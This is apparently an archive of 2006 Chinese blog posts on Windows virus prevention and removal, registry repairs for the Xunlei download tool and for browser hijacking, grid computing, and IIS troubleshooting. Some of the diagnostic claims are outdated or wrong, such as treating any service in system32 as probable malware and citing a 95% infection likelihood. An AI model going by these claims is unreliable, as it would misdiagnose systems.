随着网络信息技术的发展,企业的日常业务越来越多地和互联网发生着联系。然而,互联网是一把双刃剑,人们在享受互联网带来便利的同时,不得不面对病毒的一轮又一轮进攻。
如果在若干年前,在联网计算机不多,病毒危害不大的情况下,按部就班地一台台机器查杀毒或升级病毒库,显然还在网管员可以忍受的范围内。可如今计算机病毒已经越来越普遍,每天都有好几种新的网络病毒诞生。公司的网络也越来越大,网络病毒一旦爆发可以在几小时内感染公司内部数百台电脑,而且病毒会游走在整个网络内,往往是清除了这台机器的病毒,那台机器又被感染了;解决了那边的问题,这边又开始“造反”。
笔者担任网络管理员并主要负责安全问题已经有好几年了,在工作中积累了防杀网络病毒的丰富经验,今天就和各位读者一起探讨如何有效的防杀网络病毒。
一、网络病毒的分类:
目前流行的网络病毒从类型上分主要有木马病毒和蠕虫病毒。木马病毒实际上是一种后门程序,他常常潜伏在操作系统中监视用户的各种操作,窃取用户QQ,传奇游戏和网上银行的帐号和密码。蠕虫病毒是一种更先进的病毒,他可以通过多种方式进行传播,甚至是利用操作系统和应用程序的漏洞主动进行攻击,每种蠕虫都包含一个扫描功能模块负责探测存在漏洞的主机,在网络中扫描到存在该漏洞的计算机后就马上传播出去。
这点也使得蠕虫病毒危害性非常大,可以说网络中一台计算机感染了蠕虫病毒可以在一分钟内将网络中所有存在该漏洞的计算机进行感染。由于蠕虫发送大量传播数据包,所以被蠕虫感染了的网络速度非常缓慢,被蠕虫感染了的计算机也会因为CPU和内存占用过高而接近死机状态。
按照网络病毒的传播途径划分的话又分为邮件型病毒和漏洞性病毒。前者是通过电子邮件进行传播的,病毒将自身隐藏在邮件的附件中并伪造虚假信息欺骗用户打开该附件从而感染病毒,当然有的邮件性病毒利用的是浏览器的漏洞来实现。
这时用户即使没有打开邮件中的病毒附件而仅仅浏览了邮件内容,由于浏览器存在漏洞也会让病毒趁虚而入。漏洞型病毒则更加可怕,大家都知道目前应用最广泛的是WINDOWS操作系统,而WINDOWS系统漏洞非常多,每隔一段时间微软都会发布安全补丁弥补漏洞。
因此即使你没有运行非法软件没有打开邮件浏览只要你连接到网络中,漏洞型病毒就会利用操作系统的漏洞进入你的计算机,例如2004年风靡的冲击波和震荡波病毒就是漏洞型病毒的一种,他们造成全世界网络计算机的瘫痪,造成了巨大的经济损失。
网络在发展病毒也在发展,现在的病毒已经不是传统意义上的单一病毒了,往往一个病毒载体身兼数职,自身就是文件型,木马型,漏洞型和邮件型的混合体。这样的病毒危害性更大,查杀起来更困难。
二、防范网络病毒的方法:
俗话说“防范于未然”,如何最大限度的将网络病毒阻挡在计算机及内部网络之外呢?笔者根据多年网络安全方面的经验总结了如下几点,如果网络管理员可以在这几方面引起足够重视的话,就可以有效阻止99%的网络病毒的入侵。
第一步:将计算机中的帐户密码设置得复杂些,不要保留空密码或弱口令的帐号,将GUEST帐户禁用,并删除无用的用户。
第二步:及时更新操作系统的漏洞补丁,将WINDOWS UPDATE服务启用。并保证每周均执行补丁安装工作,安装完毕后需要重新启动计算机。因为很多补丁只有在重新启动后才能生效。
第三步:关闭不必要的系统服务,如MESSENGER,REMOTE REGISTRY SERVICE等。关闭无用的共享资源,象系统默认的共享都要关闭,如c$,d$,ipc$,admin$等。
第四步:为本机安装杀毒软件及防火墙,从而有效的防范病毒和黑客的入侵。不要以为安装其中之一就可以大功告成,需要两者兼得才能起到最大的效果。在防火墙上要配置恰当的规则,杀毒软件也要及时更新病毒库。
第五步:所有防范工作完毕之后还要对员工进行安全培训,严格要求员工不随便运行网上下载的可疑程序,不随便执行别人发来的文件,不随便运行电子邮件中的附件。
公司内网中的计算机严格遵照这五步执行后作为网络管理员的你会发现网络病毒的爆发率降低了很多,你的工作量也大大减少了。
三、查杀网络病毒的方法:
俗话说“亡羊补牢尤未迟也”,如果自己的计算机已经感染了网络病毒我们应该如何清除呢?这就需要我们在日常工作中积累经验,自己多动手查杀几次就熟悉了病毒的习性。下面笔者就自己的查杀经验为大家进行总结,希望给读者提供足够的帮助。
1、查找病毒:
其实电脑中毒跟人生病一样,总会有一些明显的症状表现出来,例如机器运行十分缓慢,上不了网,杀毒软件升不了级,WORD文档打不开,电脑反复重启等等,这些都是中毒的征兆。接下来我们就要开始搜索病毒体了。
第一步:按CTRL+SHIFT+ESC键调出WINDOWS任务管理器,查看系统运行的进程,找出不熟悉的进程并记下名称,通过搜索引擎查询判断这些进程是否是病毒产生的,也可以点击任务管理器的性能查看CPU和内存的当前状态,如果CPU的利用率接近100%或内存的占用值居高不下,电脑中毒的可能性是95%。
第二步:运行注册表编辑器,通过任务栏的“开始->运行->输入regedit”,查看都有哪些程序随WINDOWS的启动而启动。主要看hkey_local_machine\software\microsoft\windows\currentversion\run和runonce等以及hkey_current_user\software\microsoft\windows\currentversion\run和runonce等键值下是否有非法程序加载。
小提示:
在WIN98或XP系统下可以直接通过“开始->运行->msconfig”查看启动项程序。
第三步:查看WINDOWS当前启动的服务项,在“控制面板”的“管理工具”里打开“服务”,查看右边状态为“启动”的行,一般而言正常的WINDOWS服务基本上都有描述内容,双击打开认为有问题的服务项,查看其属性里的可执行文件的路径和名称,假如其路径为c:\winnt\system32\,则很有可能是病毒程序,因为大部分病毒都会将自身主程序复制到该目录下。
第四步:用浏览器上网判断,如果你的计算机可以浏览SOHU,新浪等网站但不能访问诸如www.symantec.com,www.ca.com这样的安全厂商站点的话很有可能是中了网络病毒并被修改了HOSTS文件。
2、清除病毒:
由于计算机感染了网络病毒,所以首先应该将网线从计算机上拔下,断开计算机和网络的连接,防止病毒的二次入侵及再度感染。接着按照以下的方法清除病毒。
第一步:在注册表里删除随系统启动的非法程序,然后在注册表中搜索所有该键值并全部删除。当病毒以系统服务的方式启动话还应该在hkey_local_machine\system\controlset001\services和controlset002\services里藏身,找到后全部删除。
第二步:停止所有有问题的服务,启动方式从自动改为禁用。
第三步:如果上文提到的HOSTS文件被篡改,则恢复它本来面目,即
只剩下一行有效值“127.0.0.1 localhost”,其余的行全部删除。
第四步:重新启动计算机,按F8进入安全模式,搜索病毒的执行文件,手动将其删除。
第五步:在安全模式下用升级了最新病毒库的杀毒软件对系统进行全面扫描,剿灭漏网之鱼。扫描后就可以重启计算机完成全部查杀网络病毒的操作了。
总结:
至此我们就系统的学习了防范网络病毒,查杀网络病毒的方法,相信读者按照本文介绍的内容可以有效的防杀网络病毒,将网络病毒带来的灾害和损失降低到最低点。当然网络病毒也是在发展的,新病毒层出不穷,我们只有不断补充新的查杀知识,在工作中不断积累实践经验才能在网络管理员与网络病毒的战斗中处于更加有利的地位。
分类 : 技术文摘 | 发表时间 08-05-2006
分类 : 技术文摘 | 发表时间 02-05-2006
问:我用迅雷5下载,为什么在下载地址上点击右键“使用迅雷下载”,无法启动链接下载?先谢谢你!
答:这是因为相关的注册表被破坏引起的,你可以用以下方法修复:在“开始”-“运行”中输入“regedit”启动注册表编辑器,定位到“HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt”分支。依次点击此链接下的子项,里面应该包含有“使用迅雷下载”和“使用迅雷下载全部链接”。选中“使用迅雷下载”子项,双击右侧的“默认”主键,在输入框中输入你安装的迅雷软件的路径+geturl.htm(如C:\Program Files\Thunder Network\Thunder\geturl.htm,此地址根据你geturl文件的位置所定,先看好你迅雷安装目录所在地,对于绿色安装的很重要),再双击“contexts”主键,选择键值为“十进制”,输入“34”,重新启动IE浏览器后,就可以正常使用迅雷的右键菜单下载单个文件了。“使用迅雷下载全部链接”的修复步骤与上相似,只是要把“geturl.htm”改成“getallurl.htm”,并且“contexts”的“十进制”输入“243”。
另外,迅雷官方论坛也有一个方面的描述:
完全解决迅雷无法使用右键下载的修复程序
经证实,目前由于第三方工具修改导致的浏览器上点击鼠标右键无法调用迅雷的问题,已经找到了解决办法,现推出修复程序,请各位有问题的雷友下载该修复程序进行修复。
请在进行修改前退出浏览器,然后将文件解压缩到同一目录中(任何目录都可以),运行名为“右键问题完全修复.bat”的文件即可修复成功。
如果该方法无效,请重新安装迅雷的最新版本然后重复以上过程。
以下是附件是修复程序,必须需使用IE下载,需要使用下载工具下载的用户请到http://bbs.xunlei.com/xiazai/patch001.rar
下载,以下附件和此连接内容完全相同。
使用不同操作系统的用户请下载相应的修复程序。
另外明确的告诉各位雷友的右键问题是因为某个浏览器优化软件修改了操作系统注册表导致的,修改包含以下项目:
1、将注册表[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer \BrowseNewProcess]目录下的BrowseNewProcess键值改为NO,从而IE浏览器和资源管理器进程合并,此时迅雷找不到浏览器进程右键问题就会发生。
2、将操作系统的vbscript.dll执行注销命令,使操作系统无法执行VBS脚本,浏览器点击信息无法传递到迅雷。
之所以认为是浏览器修复程序是因为以上2个修改能够防止用户的浏览器被劫持,但是这种办法破坏了操作系统。
以下文章来自: crsky,所说的附件也在crsky下载
看完此帖或下载此帖的附件后你可以:
1、完全修复你的迅雷 IE 等浏览器中右键菜单丢失或失效的问题
2、完全修复你的迅雷在 IE 中左键点击下载链接后不会调用迅雷下载的问题
3、使你可以在Maxthon(傲游)中使用迅雷5
◆ 修复迅雷在 IE 等浏览器中右键菜单丢失或失效的问题:
IE 右键菜单一般都是添加注册表相应项实现的,迅雷的 IE 右键菜单也不例外。
点“开始”→运行→输入“regedit”→定位到[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt],点“MenuExt”左边的“+”展开子项,我们可以看到很多都是 IE 右键菜单里的内容。
1、如果展开后有“迅雷下载链接”、“迅雷下载全部链接”的选中“迅雷下载链接”,双击“默认”,输入你的迅雷路径+geturl.htm(如C:\Program Files\Thunder Network\Thunder\geturl.htm)见图一,双击“contexts”→点“十进制”→输入“34”;注意最后一定要有geturl.htm,这个是实现右键迅雷下载的关键文件。
对于“迅雷下载全部链接”同上一步,只是把“geturl.htm”改成“getallurl.htm”,并且“contexts”的“十进制”输入“243”。
2、如果展开后没有“迅雷下载链接”等,可以在“MenuExt”上点右键→新建→项,输入“迅雷下载链接”,双击右边窗口的“默认”,输入你的迅雷路径+geturl.htm,并且在右边窗口点右键→新建→双字节值(即dword)→输入“contexts”,双击这个“contexts”,点“十进制”,输入“34”。
对于“迅雷下载全部链接”和上面一样,只是“默认”输入你的迅雷路径+getallurl.htm,“contexts”的“十进制”输入“243”。
如果怕麻烦就下载附件里的注册表文件导入也可,只是路径如果不是默认路径要更改注册表文件中的路径,这些都是在里面的说明说了。
◆ 修复左键单击一个下载链接后没有使用迅雷下载的问题:
首先要保证你的system32文件夹下有“xunleibho_v8.dll”这个文件,点“开始”菜单→运行→输入“%systemroot%\system32”→确定,这时就进入你所在操作系统的system32文件夹下,快速按键盘字母xun,这时会快速定位到以“xun”开头的文件上,看看有没有“xunleibho_v8.dll”,如果有,那么请看下一步。
点“开始”菜单→运行→“regedit”→定位到[HKEY_CLASSES_ROOT\CLSID\{0005A87D-D626-4B3A-84F9-1D9571695F55}\InprocServer32],在双击右边窗口的“默认”,win2000的用户将其值改为“C:\WINNT\system32\xunleibho_v8.dll”,win xp的用户将其值改为“C:\WINDOWS\system32\xunleibho_v8.dll”,最后点“确定”。
同样对[HKEY_CLASSES_ROOT\CLSID\{7C7C028B-263F-471B-8254-A2F4C739AB71}\ProgID]做和上一步一样的操作,只是“默认”改为“Xunleibho.CatchRightClick.1”。
对[HKEY_LOCAL_MACHINE\SOFTWARE\Thunder Network\ThunderOem]这个注册表项也是一样(如果没有相关项,则自己建立一个项),
新建一个字串值“ThunderOemArray”,将其值设为“thunder_backwnd”。
最后对[HKEY_LOCAL_MACHINE\SOFTWARE\Thunder Network\ThunderOem\thunder_backwnd]也是一样,新建一个字串值“Path”,将其值设为迅雷安装路径+迅雷的主程序文件(如默认的为“C:\Program Files\Thunder Network\Thunder\Thunder.exe)
这样就可以左键单击一个下载链接调用迅雷下载了,当然下载链接的文件类型要在你的迅雷监视文件类型范围内,并且最好只安装一个下载软件(如同时安装影音传送带、迅雷后左键单击一个下载链接后,可能只调用其中一个下载软件去下载)。
当然你如果怕麻烦也可以用附件里已经做好的注册表文件直接导入即可。
◆ 在Maxthon中使用迅雷5 :
如果你安装了迅雷 5 后,再使用Maxthon会发现,Maxthon的选项里设置“下载工具”为“Thunder”(迅雷),Maxthon也不会调用迅雷下载,这时我们可以通过编辑Maxthon目录下config文件夹内的“downloadmgr.ini”来修复这个问题。
右击你的Maxthon快捷方式→属性→查找目标→进入“config”文件夹下,双击打开“downloadmgr.ini”,按快捷键“Ctrl+H”,在“查找内容”中输入“迅雷4”,在“替换为”中输入“thunder_backwnd”,最后点“替换”即可。
同样,怕麻烦的朋友可以下载附件里已经做好的“downloadmgr.ini”直接解压到Maxthon\config文件夹下覆盖原文件即可。
补充:如果你是 IE 浏览器左键点击下载链接的话,另外在迅雷菜单“工具”→配置→“监视”里要勾选“监视Internet Explorer”。
最好在迅雷的菜单“工具”→选择“迅雷作为默认工具”。
分类 : 娱乐休闲 | 发表时间 26-04-2006
恶意网页越来越厉害,本文就给大家讲恶意网页修改11种系统配置的处理办法。
1.禁止使用电脑
现象描述:尽管网络流氓们用这一招的不多,但是一旦你中招了,后果真是不堪设想!浏览了含有这种恶意代码的网页其后果是:”关闭系统”、”运行”、”注销”、注册表编辑器、DOS程序、运行任何程序被禁止,系统无法进入”实模式”、驱动器被隐藏。
解决办法:一般来说上述八大现象你都遇上了的话,基本上系统就给”废”了,建议重装。
2.格式化硬盘
现象描述:这类恶意代码的特征就是利用IE执行ActiveX的功能,让你无意中格式化自己的硬盘。只要你浏览了含有它的网页,浏览器就会弹出一个警告说”当前的页面含有不安全的ctiveX,可能会对你造成危害”,问你是否执行。如果你选择”是”的话,硬盘就会被快速格式化,因为格式化时窗口是最小化的,你可能根本就没注意,等发现时已悔之晚矣。
解决办法:除非你知道自己是在做什么,否则不要随便回答”是”。该提示信息还可以被修改,如改成”Windows正在删除本机的临时文件,是否继续”,所以千万要注意!此外,将计算机上Format.com、Fdisk.exe、Del.exe、Deltree.exe等命令改名也是一个办法。
3.下载运行木马程序
现象描述:在网页上浏览也会中木马?当然,由于IE5.0本身的漏洞,使这样的新式入侵手法成为可能,方法就是利用了微软的可以嵌入exe文件的eml文件的漏洞,将木马放在eml文件里,然后用一段恶意代码指向它。上网者浏览到该恶意网页,就会在不知不觉中下载了木马并执行,其间居然没有任何提示和警告!
解决办法:第一个办法是升级您的IE5.0,IE5.0以上版本没这毛病;此外,安装金山毒霸、Norton等病毒防火墙,它会把网页木马当作病毒迅速查截杀。
4.注册表的锁定
现象描述:有时浏览了恶意网页后系统被修改,想要用Regedit更改时,却发现系统提示你没有权限运行该程序,然后让你联系管理员。晕了!动了我的东西还不让改,这是哪门子的道理!
解决办法:能够修改注册表的又不止Regedit一个,找一个注册表编辑器,例如:Reghance。将注册表中的HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System下的DWORD值”DisableRegistryTools”键值恢复为”0″,即可恢复注册表。
5.默认主页修改
现象描述:一些网站为了提高自己的访问量和做广告宣传,利用IE的漏洞,将访问者的IE不由分说地进行修改。一般改掉你的起始页和默认主页,为了不让你改回去,甚至将IE选项中的默认主页按钮变为失效的灰色。不愧是网络流氓的一惯做风。
解决办法:1.起始页的修改。展开注册表到HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main,在右半部分窗口中将”Start Page”的键值改为”about:blank”即可。同理,展开注册表到HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main,在右半部分窗口中将”Start Page”的键值改为”about:blank”即可。
注意:有时进行了以上步骤后仍然没有生效,估计是有程序加载到了启动项的缘故,就算修改了,下次启动时也会自动运行程序,将上述设置改回来,解决方法如下:
运行注册表编辑器Regedit.exe,然后依次展开HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run主键,然后将下面的”registry.exe”子键(名字不固定)删除,最后删除硬盘里的同名可执行程序。退出注册编辑器,重新启动计算机,问题就解决了。
2.默认主页的修改。运行注册表编辑器,展开HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\,将Default-Page-URL子键的键值中的那些恶意网站的网址改正,或者设置为IE的默认值。
3.IE选项按钮失效。运行注册表编辑器,将HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel中的DWORD值”Settings”=dword:1、”Links”=dword:1、”SecAddSites”=dword:1全部改为”0″,将HKEY_USERS\.DEFAULT\Software\Policies\Microsoft\Internet Explorer\Control Panel下的DWORD值”homepage”的键值改为”0″。
·恶意网页修改11种系统配置的处理办法(2)
6.篡改IE标题栏
现象描述:在系统默认状态下,由应用程序本身来提供标题栏的信息。但是,有些网络流氓为了达到广告宣传的目的,将串值”Windows Title”下的键值改为其网站名或更多的广告信息,从而达到改变IE标题栏的目的。非要别人看他的东西,而且是通过非法的修改手段,除了”无耻”两个字,再没有其它形容词了。
解决办法:展开注册表到HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\下,在右半部分窗口找到串值”Windows Title”,将该串值删除。重新启动计算机。
7.篡改默认搜索引擎
现象描述:在IE浏览器的工具栏中有一个搜索引擎的工具按钮,可以实现网络搜索,被篡改后只要点击那个搜索工具按钮就会链接到网络注氓想要你去的网站。
解决办法:运行注册表编辑器,依次展开HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Search\CustomizeSearch和HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Search\SearchAssistant,将CustomizeSearch及SearchAssistant的键值改为某个搜索引擎的网址即可。
8.IE右键修改
现象描述:有的网络流氓为了宣传的目的,将你的右键弹出的功能菜单进行了修改,并且加入了一些乱七八糟的东西,甚至为了禁止你下载,将IE窗口中单击右键的功能都屏蔽掉。
解决办法:1.右键菜单被修改。打开注册表编辑器,找到HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt,删除相关的广告条文。
2.右键功能失效。打开注册表编辑器,展开到HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Restrictions,将其DWORD值”NoBrowserContextMenu”的值改为0。
9.篡改地址栏文字
现象描述:中招者的IE地址栏下方出现一些莫名其妙的文字和图标,地址栏里的下拉框里也有大量的地址,并不是你以前访问过的。
解决办法:1.地址栏下的文字。在HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\ToolBar下找到键值LinksFolderName,将其中的内容删去即可。
2.地址栏中无用的地址。在HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypeURLs中删除无用的键值即可。
10.启动时弹出对话框
现象描述:1.系统启动时弹出对话框,通常是一些广告信息,例如欢迎访问某某网站等等。2.开机弹出网页,通常会弹出很多窗口,让你措手不及,恶毒一点的,可以重复弹出窗口直到死机。
解决办法:1.弹出对话框。打开注册表编辑器,找到HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon主键,然后在右边窗口中找到”LegalNoticeCaption”和”LegalNoticeText”这两个字符串,删除这两个字符串就可以解决在启动时出现提示框的现象了。
2.弹出网页。点击”开始-运行-输入msconfig”,选择”启动”,把里面后缀为url、html、htm的网址文件都勾掉。
11.IE窗口定时弹出
现象描述:中招者的机器每隔一段时间就弹出IE窗口,地址指向网络注氓的个人主页。不晓得是不是网络流氓以为这样你就会经常光顾?
解决办法:
分类 : 业界动态 | 发表时间 21-04-2006
网格(Grid)被誉为继Internet和Web之后的第三次信息技术浪潮。网格与Web的主要区别是,Web是对HTML文件的一致访问,而网格是对重要资源柔性的、高性能的访问,即时地创建强大的虚拟计算系统。
实际上,网格是利用互联网把地理上广泛分布的各种资源(包括计算资源、存储资源、带宽资源、软件资源、数据资源、信息资源、知识资源等)连成一个逻辑整体,就像一台超级计算机一样,为用户提供一体化信息和应用服务(计算、存储、访问等),虚拟组织最终实现在这个虚拟环境下进行资源共享和协同工作,彻底消除资源“孤岛”,让人们使用网格上的资源像用电一样简单。
由“点”到“网”
“网格计算”(Grid Computing)使人们可以轻而易举地为一些大型科研任务,创建和使用动态、分布式、高性能的计算环境。而这些在以前是不可能实现的,或开展起来所付出的代价很高,如高能物理数据分析、气候建模、宇宙观测、实时遥感数据处理、虚拟现实等;它也可以在商业计算领域应用,如联机分析处理、数据挖掘、商业智能等。此外,它还可以广泛地应用在电子商务、电子政务等领域。
网格计算使人们能够共享计算、存储、数据和应用资源。这种计算模式是利用互联网把分散在不同地理位置的计算机组织成一个“虚拟的超级计算机”,其中每台参与计算的计算机就是一个“节点”,而整个计算是由成千上万个“节点”组成的“一张网格”。
Web与网格融合
网格有别于Web的基本特征就在于服务的形式。目前,Web要创建应用环境,还要靠开发人员按照Web协议开发,而网格是在更高层次上对这些应用提供的一种服务形式。因此,将来的应用系统所基于的平台,应该是网格所提供的基本服务。而这种服务的本身,又会不断动态地加入到网格当中,使得网格服务内容不断丰富。
目前,网格计算技术之所以能够引起社会如此广泛的讨论,主要原因是网格能够通过网络利用众多闲置的CPU资源形成高性能的计算能力。但是遇到的问题是,现有的大量商业应用软件和数据库软件都不支持网格技术,这就是现实与理想的差距。
对网格计算的发展来说,目前相当重要的一项工作就是建立一个通用的网格服务标准规范,把网格计算与目前的Web服务能够很好地融合。
锁定商务应用服务
由IBM、Sun和Microsoft倡导的全球Grid论坛(Global Grid Forum),把目标锁定在把网格计算技术与Web服务计算结合起来提供商务应用服务,从而将网格计算技术从科学计算领域引入到商务应用领域,并引发了IBM、Sun和Microsoft采取行动,将网格计算与Web服务相结合,实现一种使业务交易在分布于Internet服务器上运行的技术。
在全球Grid论坛上,Globus工具包开放源码小组(主要成员是Argonne国家实验室、芝加哥大学和南加州大学)和IBM公司共同倡导开放式网格服务体系结构(Open Grid Services Architecture,OGSA)。
倡导OGSA
OGSA是在Globus网格计算工具包和Web服务技术融合的基础上提出的一套规范和标准。OGSA将与服务器版Java、Web服务以及商业数据库紧密集成,实现网格计算在商务领域的广泛应用。
OGSA采用纤维层、连接层、资源层、协作层、应用层五层结构。其中,纤维层是为网格协议仲裁的共享访问提供各种资源,如计算资源、存储系统、数据目录等物理资源。连接层定义网格特定的网络处理所需的核心通信协议和安全认证协议。资源层建立在连接层的通信与认证协议基础之上,是对个人资源安全共享操作的谈判、启动、监视、控制、记账和支付定义协议、API和SDK。协作层包含的协议、服务、APIs 和SDKs ,与任何特定资源无关,而是全局性和跨资源集合的一种捕获交互,最后在应用层通过调用“服务”来构造应用。
OGSA吸纳了许多Web服务标准,如Web服务描述语言(WSDL)、简单对象访问协议(SOAP)、目录访问协议(LDAP)、Web服务探测(WS-Inspection)等。这些标准用于定位、调度计算资源,并保证它们的安全。
Web服务架构OGSA
OGSA采用Web服务框架具有两项优点:一方面,通过注册和发现接口定义和终端(Endpoint),实现描述以及动态产生特定接口绑定的代理,在异构环境中能够支持服务的动态发现与合成;另一方面,由于Web服务机制在商业应用领域广泛被采用,OGSA采用Web服务框架,使人们能够利用许多现有的开发工具和扩展服务,如产生语言绑定的WSDL处理器。
OGSA从Web服务的标准接口定义了多协议绑定、多个实现(Multiple Implementations)、本地/远程透明机制。OGSA网格服务模型包括一些具有代表性的持久服务和许多潜在的短暂服务,所有服务遵循特定的网格服务接口和行为。
从电子商务发展角度来看,Web服务提供基于XML的组件式开放标准化软件,而网格计算则满足了海量商业数据分析(如在客户关系管理中的数据挖掘)所需的CPU资源要求。因此,Web服务技术与网格计算技术的融合,是把Internet作为商业计算平台,推进电子商务进一步发展的利器,将极大地改变传统电子商务开发和运营模式。
融合赢得多方技术支持
Microsoft曾表示将加入到推广网格计算技术的行列中,希望Globus工具包可以支持Windows XP操作系统及其Web服务解决方案.NET。
为对抗Microsoft的.NET,以提供服务收取费用方式代替一次买断产品的经营模式,IBM决定将网格技术应用拓展到商用计算领域。IBM希望以网格计算技术、OS/2操作系统及WebSphere平台软件,打造出可提供与.NET类似的服务环境。同时,IBM表示WebSphere、Tivoli管理软件、服务器和内存系统以及服务器硬件设备都将支持网格技术。
为了给企业提供网格计算的强大工具,Sun发布了针对网格计算和Web服务全面集成的软件平台——技术计算门户。技术计算门户解决方案由iPlanet Portal、Grid Engine和Sun ONE构成,提供了在网格环境下密集计算、在Sun ONE环境下数据存储,以及通过基于Web的图形用户界面(即网络门户)来访问这些数据的能力,以满足企业的各种业务需求,并使企业获得更高的效率和投资回报率。Sun新的网格计算/Web服务解决方案将为群集计算环境和校园网格环境,甚至全球网格(Great Global Grid)环境注入活力。
分类 : 网站技术 | 发表时间 20-04-2006
原文出处:http://www.iisfaq.com/Default.aspx?tabid=3094
整理翻译:ajou
1.如果WEB站点目录下有Global.asa文件,改此文件文件名为Global.old.重启WEB服务,在记事本中写如下代码(原文中无代码,实际最简单的那种asp源码就行,译者注).文件另存为Test.asp于WEB根目录下.
如果asp文件能正常执行,问题就出在Global.asa上,如果依然不行,请转到第二步.
参阅如下微软知识库有关Global.asa文件出错的更多信息.
Q288245 PRB: Global.asa Does Not Fire from Personal Web Server on Windows 98
Q265275 FP2000: Global.asa Does Not Run in FrontPage Web
Q173742 FIX: Global.asa Is Not Executed If Restricting Web Access
2.将web站点的应用程序保护级别设置为”低”,重启IISAdmin服务.如果asp文件如此能正常执行,说明问题出在IWAM用户上,请跳到第三步继续.如果没有正常执行,请在管理工具中检查组件服务确保能看到IIS Packages,确保组件服务没有失败后,确认本地用户组中有如下用户存在:
NT AUTHORITY\Authenticated Users
NT AUTHORITY\INTERACTIVE
关于更多组件服务出错的信息,请参考入下知识文章:
Q301919 PRB: Cannot Expand ‘My Computer’ in Component Services MMC Snap-In
3.如果通过第二步asp文件能正常执行,将站点的应用程序保护级别设回”中”或”高”,将IWAM用户添加到本地管理员用户组中,如果通过这步,asp文件能正常执行,说明IWAM用户的访问许可权限就存在问题,请跳到第四步,如果asp文件还没正常执行,请在命令提示符中执行Synciwam.vbs 工具.
方法:打开命令提示符窗口敲入如下命令:
C:\Inetpub\adminscripts>cscript synciwam.vbs.
关于IWAM用户(设置不正确)导致asp文件不能正常执行,请参考入下知识库.
Q308622 HOW TO: Perform Administration Tasks in IIS from a Command Prompt
Q297989 PRB: Configured Identity Is Incorrect for IWAM Account
Q255770 PRB: Logon Failure: Unknown User Name or Bad Password When You Run Out-of-Process Webs
Q236007 Domain Controller Demotion Causes Out-of-Process Applications to Fail
4.解决IWAM用户许可权限的问题,请使用windows 2000的第三方产品:Regmon 和 Filemon.请在http://www.sysinternals.com中下载这些工具.
当你执行asp页面请求时运行这些工具, Dllhost.exe 进程在Regmon 中查找”ACCDENIED” (在Filemon中查找”FAILURE”).
注意:在IE进程出现”操作失败”时不要紧张,这只是普通现象.~~
关于IIS功能正常运作所需的最小条件,请参阅知识库:
Q271071 Minimum NTFS Permissions Required for IIS 5.0 to Work
在看到Dllhost.exe 进程”操作失败”的错误信息后,用Regedit32工具修改注册表里任何必须的NTFS许可权限(好像是病句,,汗…)
5.在装完IIS5.0后,从WEB 服务器控制台或其他网络上的工作站浏览asp或html文件,WEB服务可能返回如下错误信息:
HTTP 500 内部服务器错误.
默认的web服务可能处于运行状态,如果运行netstat -an 你可能注意到WEB服务器正监听TCP80端口,即HTTP的默认端口.
注意:如果在使用IE5.0(或以上版本,译者注),你可能屏蔽了IE高级选项中的显示友好HTTP错误信息选项,更多信息:请参考微软知识库:
Q218155 Description of Hypertext Transport Protocol Error Messages
下面的几条可能出现在装有IIS5.0机器的事件日志中:
Application Log: COM+ error with Event ID 4099
System Log: W3SVC error with Event ID 59
System Log: W3SVC warning with Event ID 36.
Iis5.log 文件(WINNT目录下)可能包含下面错误信息:
0x8004e00f=COM+ was unable to talk to the Microsoft Distributed Transaction Coordinator
你正试图打开com+管理者使用的组件服务,MMC停止响应.
原因
IIS5.0依赖与COM+,COM+依赖于Distributed Transaction Coordinator (DTC) 服务运行,DTC检查版本的机制(包括在windows 2000以前的SQL SERVER版本)不能识别Windows2000所用的版本属性,结果SQL SERVER的DTC安装程序移除了WINDOWS 2000安装的DTC服务,更多请查阅微软知识库:
Q249310 BUG: Installing SQL Server on Windows 2000 Uninstalls DTC Service
解决
如下步骤解决这个问题:
a.验证Dtcsetup.exe (默认在c:\Winnt\System32 下)是否为1999.9.3422.24 或以后版本号
b.运行Dtcsetup.exe 安装DTC服务
c.开始DTC服务
d.控制面板中,双击”添加删除程序”
e.选”添加删除Windows组件”,移除IIS5.0再重新安装.
现状
微软已经确认在SQL Server versions 6.5 和 7.0 and MSDE 1.0中这会是个问题
详细请参见文章:
http://support.microsoft.com/default.aspx?scid=kb;en-us;Q257267
6.最后一招:依照下面步骤自己创建IIS Packages
a.浏览组件服务删除下列包
a.IIS In-Process Applications
b.IIS Out-of-Process Pooled Applications
c.IIS Utilities
b.打开命令提示符,转到文件夹%windir%\system32\inetsrv,执行命令:
rundll32 wamreg.dll, CreateIISPackage
注意:CreateIISPackage是大小写敏感的,确人输入正确.
c.重新打开组件服务,你将看到IIS COM+应用已经重新创建了.
d.从命令提示符中运行IISRESTART再测试之前没有正确执行的任何asp文件.
分类 : 技术文摘 | 发表时间 19-04-2006
随着网络的普及,网上的软件也越来越多,给大家带来了极大的方便,但有一些软件以IE插件的形式强制安装,无法卸载,顽固地驻留于用户电脑之中;有些软件在安装后,并没有提供卸载程序,即使在控制面板中将其删除,仍然会有残余的线程文件向外发送信息,用户通常只能采用手工的办法去删除,这样操作起来不但麻烦,而且还容易误删系统文件。以下是一些卸载顽固程序比较另类的方法,希望对大家有所帮助。
1、巧用QQ来卸载顽固程序
将QQ安装目录下的unins000.exe文件拷贝到要卸载文件的安装目录,再执行该程序即可!这种办法对于卸载那些反安装程序丢失或者损坏的文件有特效。
2、Winamp的卸载程序可以安全卸载大部分应用程序
